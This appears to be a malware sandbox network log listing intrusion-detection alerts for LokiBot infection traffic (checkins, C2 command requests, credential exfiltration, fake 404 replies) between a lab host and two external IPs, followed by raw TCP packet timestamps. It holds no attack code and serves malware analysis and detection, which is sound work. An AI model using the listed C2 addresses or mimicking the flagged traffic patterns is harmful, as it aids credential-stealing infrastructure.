188.114.96.3192.168.2.380498852025483 08/11/22-06:43:55.477446	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49885	188.114.96.3	192.168.2.3
192.168.2.3188.114.97.349796802825766 08/11/22-06:43:04.193279	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49796	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349742802024312 08/11/22-06:42:12.661275	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49742	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349759802024313 08/11/22-06:42:31.695874	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49759	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349898802024318 08/11/22-06:44:09.907279	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49898	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349748802021641 08/11/22-06:42:19.613257	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49748	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349895802024318 08/11/22-06:44:06.157277	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49895	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349747802825766 08/11/22-06:42:18.537201	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49747	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349798802025381 08/11/22-06:43:06.576803	TCP	2025381	ET TROJAN LokiBot Checkin	49798	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349888802025381 08/11/22-06:44:00.133246	TCP	2025381	ET TROJAN LokiBot Checkin	49888	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349792802024318 08/11/22-06:42:59.404301	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49792	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349797802021641 08/11/22-06:43:05.379365	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49797	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349895802024313 08/11/22-06:44:06.157277	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49895	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349754802021641 08/11/22-06:42:26.308314	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49754	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349852802024313 08/11/22-06:43:38.361573	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49852	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349785802024318 08/11/22-06:42:51.879415	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49785	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349794802021641 08/11/22-06:43:01.964847	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49794	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349884802024318 08/11/22-06:43:54.330408	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49884	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349755802021641 08/11/22-06:42:27.395952	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49755	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349892802021641 08/11/22-06:44:04.916628	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49892	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349792802024313 08/11/22-06:42:59.404301	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49792	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349753802825766 08/11/22-06:42:25.207102	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49753	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349757802024313 08/11/22-06:42:29.610436	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49757	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349785802024313 08/11/22-06:42:51.879415	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49785	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349782802024313 08/11/22-06:42:50.570997	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49782	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349805802025381 08/11/22-06:43:09.287221	TCP	2025381	ET TROJAN LokiBot Checkin	49805	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349867802021641 08/11/22-06:43:45.824252	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49867	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349786802825766 08/11/22-06:42:53.219319	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49786	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349782802024318 08/11/22-06:42:50.570997	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49782	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349788802021641 08/11/22-06:42:54.331478	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49788	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349743802025381 08/11/22-06:42:14.045456	TCP	2025381	ET TROJAN LokiBot Checkin	49743	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349881802825766 08/11/22-06:43:50.015660	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49881	80	192.168.2.3	188.114.97.3
188.114.97.3192.168.2.380497852025483 08/11/22-06:42:51.983930	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49785	188.114.97.3	192.168.2.3
192.168.2.3188.114.96.349756802024318 08/11/22-06:42:28.447484	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49756	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349793802024313 08/11/22-06:43:00.645450	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49793	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349744802825766 08/11/22-06:42:15.052087	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49744	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349746802024318 08/11/22-06:42:17.452589	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49746	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349791802021641 08/11/22-06:42:58.117986	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49791	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349793802024318 08/11/22-06:43:00.645450	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49793	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349885802825766 08/11/22-06:43:55.376397	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49885	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349823802825766 08/11/22-06:43:13.321407	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49823	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349897802024318 08/11/22-06:44:08.828123	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49897	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349830802025381 08/11/22-06:43:16.837786	TCP	2025381	ET TROJAN LokiBot Checkin	49830	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349853802825766 08/11/22-06:43:40.660156	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49853	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349884802024313 08/11/22-06:43:54.330408	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49884	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349852802024318 08/11/22-06:43:38.361573	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49852	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349757802024318 08/11/22-06:42:29.610436	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49757	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349817802825766 08/11/22-06:43:11.901228	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49817	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349758802825766 08/11/22-06:42:30.656105	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49758	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349889802025381 08/11/22-06:44:01.764745	TCP	2025381	ET TROJAN LokiBot Checkin	49889	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349828802021641 08/11/22-06:43:14.503252	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49828	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349751802021641 08/11/22-06:42:22.964431	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49751	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349786802021641 08/11/22-06:42:53.219319	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49786	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349811802024318 08/11/22-06:43:10.662100	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49811	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349898802024313 08/11/22-06:44:09.907279	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49898	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349805802021641 08/11/22-06:43:09.287221	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49805	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349817802024313 08/11/22-06:43:11.901228	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49817	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349828802825766 08/11/22-06:43:14.503252	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49828	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349817802024318 08/11/22-06:43:11.901228	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49817	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349794802825766 08/11/22-06:43:01.964847	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49794	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349885802024313 08/11/22-06:43:55.376397	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49885	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349751802025381 08/11/22-06:42:22.964431	TCP	2025381	ET TROJAN LokiBot Checkin	49751	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349753802021641 08/11/22-06:42:25.207102	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49753	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349823802021641 08/11/22-06:43:13.321407	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49823	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349879802021641 08/11/22-06:43:48.403290	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49879	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349785802825766 08/11/22-06:42:51.879415	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49785	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349883802825766 08/11/22-06:43:53.308240	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49883	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349750802024313 08/11/22-06:42:21.832277	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49750	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349788802025381 08/11/22-06:42:54.331478	TCP	2025381	ET TROJAN LokiBot Checkin	49788	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349896802024313 08/11/22-06:44:07.789189	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49896	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349748802825766 08/11/22-06:42:19.613257	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49748	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349750802024318 08/11/22-06:42:21.832277	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49750	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349748802025381 08/11/22-06:42:19.613257	TCP	2025381	ET TROJAN LokiBot Checkin	49748	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349751802825766 08/11/22-06:42:22.964431	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49751	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349793802025381 08/11/22-06:43:00.645450	TCP	2025381	ET TROJAN LokiBot Checkin	49793	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349756802021641 08/11/22-06:42:28.447484	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49756	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349746802024313 08/11/22-06:42:17.452589	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49746	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349882802025381 08/11/22-06:43:51.663595	TCP	2025381	ET TROJAN LokiBot Checkin	49882	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349791802025381 08/11/22-06:42:58.117986	TCP	2025381	ET TROJAN LokiBot Checkin	49791	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349840802825766 08/11/22-06:43:28.505356	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49840	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349766802825766 08/11/22-06:42:42.773950	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49766	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349795802825766 08/11/22-06:43:03.020333	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49795	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349896802024318 08/11/22-06:44:07.789189	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49896	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349766802024318 08/11/22-06:42:42.773950	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49766	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349828802025381 08/11/22-06:43:14.503252	TCP	2025381	ET TROJAN LokiBot Checkin	49828	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349747802024318 08/11/22-06:42:18.537201	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49747	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349764802024318 08/11/22-06:42:41.209817	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49764	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349898802025381 08/11/22-06:44:09.907279	TCP	2025381	ET TROJAN LokiBot Checkin	49898	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349795802021641 08/11/22-06:43:03.020333	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49795	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349774802025381 08/11/22-06:42:44.099150	TCP	2025381	ET TROJAN LokiBot Checkin	49774	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349747802024313 08/11/22-06:42:18.537201	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49747	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349840802025381 08/11/22-06:43:28.505356	TCP	2025381	ET TROJAN LokiBot Checkin	49840	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349752802021641 08/11/22-06:42:24.044623	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49752	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349788802825766 08/11/22-06:42:54.331478	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49788	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349892802024318 08/11/22-06:44:04.916628	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49892	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349750802825766 08/11/22-06:42:21.832277	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49750	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349797802024318 08/11/22-06:43:05.379365	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49797	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349749802024318 08/11/22-06:42:20.745320	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49749	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349881802025381 08/11/22-06:43:50.015660	TCP	2025381	ET TROJAN LokiBot Checkin	49881	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349883802024318 08/11/22-06:43:53.308240	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49883	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349794802024313 08/11/22-06:43:01.964847	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49794	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349875802025381 08/11/22-06:43:47.334573	TCP	2025381	ET TROJAN LokiBot Checkin	49875	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349892802024313 08/11/22-06:44:04.916628	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49892	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349755802024313 08/11/22-06:42:27.395952	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49755	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349838802025381 08/11/22-06:43:24.421881	TCP	2025381	ET TROJAN LokiBot Checkin	49838	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349786802025381 08/11/22-06:42:53.219319	TCP	2025381	ET TROJAN LokiBot Checkin	49786	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349794802024318 08/11/22-06:43:01.964847	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49794	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349764802024313 08/11/22-06:42:41.209817	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49764	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349749802024313 08/11/22-06:42:20.745320	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49749	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349757802021641 08/11/22-06:42:29.610436	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49757	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349785802021641 08/11/22-06:42:51.879415	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49785	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349883802024313 08/11/22-06:43:53.308240	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49883	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349766802021641 08/11/22-06:42:42.773950	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49766	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349867802024313 08/11/22-06:43:45.824252	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49867	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349805802825766 08/11/22-06:43:09.287221	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49805	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349850802025381 08/11/22-06:43:33.879385	TCP	2025381	ET TROJAN LokiBot Checkin	49850	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349777802024318 08/11/22-06:42:45.276948	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49777	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349853802025381 08/11/22-06:43:40.660156	TCP	2025381	ET TROJAN LokiBot Checkin	49853	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349782802021641 08/11/22-06:42:50.570997	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49782	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349811802825766 08/11/22-06:43:10.662100	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49811	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349744802025381 08/11/22-06:42:15.052087	TCP	2025381	ET TROJAN LokiBot Checkin	49744	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349761802025381 08/11/22-06:42:34.002289	TCP	2025381	ET TROJAN LokiBot Checkin	49761	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349778802024313 08/11/22-06:42:46.945645	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49778	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349763802825766 08/11/22-06:42:39.324991	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49763	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349852802825766 08/11/22-06:43:38.361573	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49852	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349777802024313 08/11/22-06:42:45.276948	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49777	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349758802025381 08/11/22-06:42:30.656105	TCP	2025381	ET TROJAN LokiBot Checkin	49758	80	192.168.2.3	188.114.97.3
188.114.97.3192.168.2.380497982025483 08/11/22-06:43:06.684563	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49798	188.114.97.3	192.168.2.3
192.168.2.3188.114.97.349757802825766 08/11/22-06:42:29.610436	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49757	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349798802825766 08/11/22-06:43:06.576803	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49798	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349859802825766 08/11/22-06:43:42.759258	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49859	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349823802024318 08/11/22-06:43:13.321407	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49823	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349763802021641 08/11/22-06:42:39.324991	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49763	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349742802025381 08/11/22-06:42:12.661275	TCP	2025381	ET TROJAN LokiBot Checkin	49742	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349885802024318 08/11/22-06:43:55.376397	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49885	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349852802021641 08/11/22-06:43:38.361573	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49852	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349755802024318 08/11/22-06:42:27.395952	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49755	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349797802024313 08/11/22-06:43:05.379365	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49797	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349887802025381 08/11/22-06:43:58.405291	TCP	2025381	ET TROJAN LokiBot Checkin	49887	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349830802825766 08/11/22-06:43:16.837786	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49830	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349756802825766 08/11/22-06:42:28.447484	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49756	80	192.168.2.3	188.114.96.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 11, 2022 06:42:12.641289949 CEST	49742	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:12.658476114 CEST	80	49742	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:12.658581972 CEST	49742	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:12.661274910 CEST	49742	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:12.678405046 CEST	80	49742	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:12.678615093 CEST	49742	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:12.695673943 CEST	80	49742	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:12.770203114 CEST	80	49742	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:12.770303965 CEST	80	49742	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:12.770360947 CEST	49742	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:12.773736954 CEST	49742	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:12.787421942 CEST	80	49742	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:14.025392056 CEST	49743	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:14.042526960 CEST	80	49743	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:14.042761087 CEST	49743	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:14.045455933 CEST	49743	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:14.062542915 CEST	80	49743	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:14.062895060 CEST	49743	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:14.080081940 CEST	80	49743	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:14.156966925 CEST	80	49743	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:14.157006025 CEST	80	49743	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:14.157121897 CEST	49743	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:14.157250881 CEST	49743	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:14.174371004 CEST	80	49743	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:15.032388926 CEST	49744	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:15.049277067 CEST	80	49744	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:15.049468040 CEST	49744	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:15.052087069 CEST	49744	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:15.068974972 CEST	80	49744	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:15.069155931 CEST	49744	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:15.086220026 CEST	80	49744	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:15.165085077 CEST	80	49744	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:15.165282965 CEST	49744	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:15.182149887 CEST	80	49744	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:15.385853052 CEST	80	49744	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:15.386019945 CEST	49744	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:16.141204119 CEST	49745	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:16.158157110 CEST	80	49745	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:16.158272028 CEST	49745	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:16.160936117 CEST	49745	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:16.177822113 CEST	80	49745	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:16.177916050 CEST	49745	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:16.194792032 CEST	80	49745	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:16.296185017 CEST	80	49745	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:16.296262026 CEST	80	49745	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:16.296331882 CEST	49745	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:16.296387911 CEST	49745	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:16.313214064 CEST	80	49745	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:17.432554007 CEST	49746	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:17.449594975 CEST	80	49746	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:17.449698925 CEST	49746	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:17.452589035 CEST	49746	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:17.469443083 CEST	80	49746	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:17.469538927 CEST	49746	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:17.486363888 CEST	80	49746	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:17.548320055 CEST	80	49746	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:17.548495054 CEST	49746	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:17.565593004 CEST	80	49746	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:17.772173882 CEST	80	49746	188.114.97.3	192.168.2.3
